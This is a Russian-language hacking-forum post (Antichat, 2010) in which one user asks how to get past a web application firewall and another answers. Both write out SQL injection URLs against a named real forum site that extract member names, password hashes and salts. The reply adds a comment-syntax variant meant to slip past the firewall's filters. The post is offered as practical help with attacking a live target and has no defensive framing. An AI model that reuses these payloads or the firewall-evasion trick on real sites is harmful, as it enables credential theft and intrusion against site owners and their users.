07.01.2010, 15:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от Nightmarе
А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+novaboard_members+where+id=1+--+
Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями... значит плохо смотрел )
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&auth or_id=1&forums[]=1)/*!union*/select+1,2,3,4,concat_ws(0x3a,name,password,pass_s alt),6,7,8,9+from+forum_members--+1
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|